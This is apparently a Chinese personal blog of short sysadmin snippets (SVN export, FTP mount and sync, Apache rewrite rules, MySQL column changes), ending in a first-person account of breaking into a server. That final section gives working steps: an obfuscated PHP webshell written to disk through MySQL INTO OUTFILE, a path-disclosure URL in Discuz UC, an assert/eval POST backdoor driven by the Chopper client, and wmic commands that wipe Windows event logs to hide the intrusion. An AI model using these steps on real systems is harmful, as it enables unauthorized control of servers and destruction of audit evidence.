片断De记忆

cat /dev/null >/usr/local/directadmin/data/admin/tickets.list
rm -rf /usr/local/directadmin/data/tickets/*

svn checkout SVN源地址 目标路径
cd 目标路径
find . -type d -name ".svn"|xargs rm -rf
chown -R 要更改拥有者的名称 目标路径

双向同步
rpm -Uhv http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS//rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm
yum install curlftpfs
make ftp_test
curlftpfs ftp://IP_ADDRESS/test/ /home/yemaoshen/ftp_test/ -o user="yemaosheng:com" -o allow_other
make local_test
yum install unison
unison ./ftp_test ./local_test -auto -silent

Read More »

转自:http://www.hostloc.com/thread-43370-1-1.html
运行环境：Windows .Net Framework SP1
以系统服务方式自动运行，无需登陆手动执行
支持具体到秒级的cron定时URL请求
自动采集及网站后台自动任务必备的工具
－－－－－－－－－
文件清单：
install.bat　 安装，将UrlCron服务安装到系统Servcie服务中，运行on.bat可马上执行
on.bat　　　 手动启动服务
off.bat　　　 手动停止服务
uninstall.bat 卸载，从服务中删除UrlCron服务
cron.log　　　记录运行日志及请求错误记录
－－－－－－－－－
cron.ini　　　需要请求的URL清单配置，配置格式：时间(秒) 空格 Url地址，一行为一个任务线程urlcron-v1.0.zip

网上看到的,感觉不错,就先cp下来了
RewriteEngine on
RewriteCond   %{HTTP_HOST}                 ^[^.]+\.site\.com$
RewriteRule   ^(.+)                        %{HTTP_HOST}$1          [C]
RewriteRule   ^([^.]+)\.site\.com(.*)   http://www.site.com/$1$2

转自:http://www.sablog.net/blog/archives/551/
//主键

alter table tabelname add new_field_id int(5) unsigned default 0 not null auto_increment ,add primary key (new_field_id);

//增加一个新列

alter table t2 add d timestamp;
alter table infos add ex tinyint not null default '0';

Read More »

CC攻击模块

Read More »

首先拿到mysql的root帐号和密码,然后破解了phpmyadmin路径
然后进去用了一些办法,首先
创建一个表
create table tmp(str TEXT);
然后写PHP一句话
insert into tmp values("<?");
insert into tmp values("$_=\"\";");
insert into tmp values("$_[+\"\"]='';");
insert into tmp values("$_=\"$_\".\"\";");
insert into tmp values('$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");');
insert into tmp values("?>");
insert into tmp values("<?=${'_'.$_}['_'](${'_'.$_}['__']);?>");
好,然后通过X2的UC来爆路径,访问xxxx/uc_server/control/admin/db.php
然后生成一句话文件
select * from tmp into outfile "d:\\xx\\xx\\onesentence.php";
然后用菜刀工具http://www.maicaidao.com/
caidao-20111116.zip
添加这个站点时,地址就是文件的访问地址/onesentence.php?_=assert&__=eval($_POST['pass']),密码是pass
然后就可以用这个来控制机器咯,嗯.
忽然发现我竟然做了一次HACKER,难以置信了,嗯.
吐槽:不过违法的事还是少做吧,嗯...
擦屁股,清空日志:
cmd命令如下,用PHP后门来处理
wmic nteventlog where (description like \"%secevent%\") call cleareventlog
wmic nteventlog where (description like \"%sysevent%\") call cleareventlog
wmic nteventlog where (description like \"%appevent%\") call cleareventlog